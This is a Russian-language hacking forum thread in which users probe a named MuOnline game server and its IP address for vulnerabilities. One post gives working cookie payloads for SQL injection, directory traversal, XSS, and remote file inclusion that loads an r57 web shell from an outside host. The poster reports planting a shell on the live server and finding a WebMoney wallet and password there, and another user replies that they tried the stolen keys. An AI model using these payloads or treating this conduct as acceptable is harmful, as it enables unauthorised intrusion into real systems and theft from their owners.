Всем привет! Вот сайт http://85.115.112.18/ XSpider говорит что там есть SQL Inject! Вот только я его невижу! Ещё там есть http://85.115.112.18/server-status P.S. Не верьте моей репутации! Я на самом деле знаю SQL Injection, PHP Injection читаю статейки по XSS а разные юзвери которые незнают что такое брут ходят с неплохими репутациями! Где справедливость?!
EST a1ien, тоже MuOnline увлекаешься =) Я просто MuOnline люблю исследовать, потомучто не умею запросами выбивать названия таблиц, а так всё зарание знаю =) Зкажите почему XSpider выдаёт SQL Inject Я лично его там невижу! Хмм... Интересно... Если вписать %27 то он его не фильтрует, но и нет ошибки =( А если так, фильтрует http://mu.partylife.lv/index.php?pg=lang&lg=ru' И раз уж все дружно ищем кривой php =) То вот http://mu.partylife.lv/index.php?pg=lang&lg=ru И естествено http://mu.partylife.lv/index.php?pg=lang&lg=en Ещё кое-что... Не уязвимость, но понятно сколько их там =) Защёл в любую папку! http://mu.partylife.lv/user_images/ Посмотрел HTML <META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://mu.partylife.lv/"> По моему не хватает пару " Ну кто так делает... Что за админ там... У меня ещё вопрос... Можно-ли как-то подконнектиться к ихней MySQL... Судя по сайту у них там скорей всего root без пароля, серверный адресс мы знаем =) Можно попытаться, но только если есть такое чудо, как "Подключение к чужой MySQL" <offtopic> Нда... Может я заслужил свою репутацию -4! Даже тему немогу создать там где надо! Перенесите плиз Форум АНТИЧАТ > ОФФТОП > Болталка > Развлечения > On-line игры и другие. Уязвимости. Коды. </offtopic> Вот ещё немного папок! http://mu.partylife.lv/downloads/ http://mu.partylife.lv/index/ http://mu.partylife.lv/login/ http://mu.partylife.lv/logout/ http://mu.partylife.lv/server-status/ - Интересно... http://mu.partylife.lv/server-info/ - Оч интересно... http://mu.partylife.lv/src/ http://mu.partylife.lv/stats/ http://mu.partylife.lv/video/ http://mu.partylife.lv/includes/ http://mu.partylife.lv/img/ http://mu.partylife.lv/menu/ http://mu.partylife.lv/img/misc/ Многие из них бесполезны! Но меня оч заинтересовало /server-info/
Вопервых там стоит винда во вторых MSSQL а в третьих _http://mu.partylife.lv/index.php?pg=lang&lg=ru здесь нету как я понял запроса к базе а просто идет через case
О, кстати, я тут собираюсь исходники MuOnline на баги тестить Version=0.97.04 У кого есть какие-либо наработки по этой версии?
1ten0.0net1, у меня есть 97 сервак с Castle Siege, Chaos Castle тама все порты переделаны, на нём не идёт Hack Speed, MuPie и много другой читерской фигни! Вот такой вот 97... Жестоко его переделали!
А вот есть там SQL injection! И еще Directory traversal, File inclusion и Cross Site Scripting. И все это в cookies, в параметре lang и в char. char=' ; lang=../../../../../../../../boot.ini ; lang=http://site.ru/r57.php ; lang=><script>alert(/ok/)</script>. Тут - http://85.115.112.18/inc.php r57shell =) На диске d:\lol валяется webmoney с паролем. Мой кошелек - Z305549227839 если что8). Shell удалил, так как уже один есть.
Go0o$E, респект за инклуд Только ключики для wm не подходят, сильно маленькие... Сейчас еще чего гляну интересного )
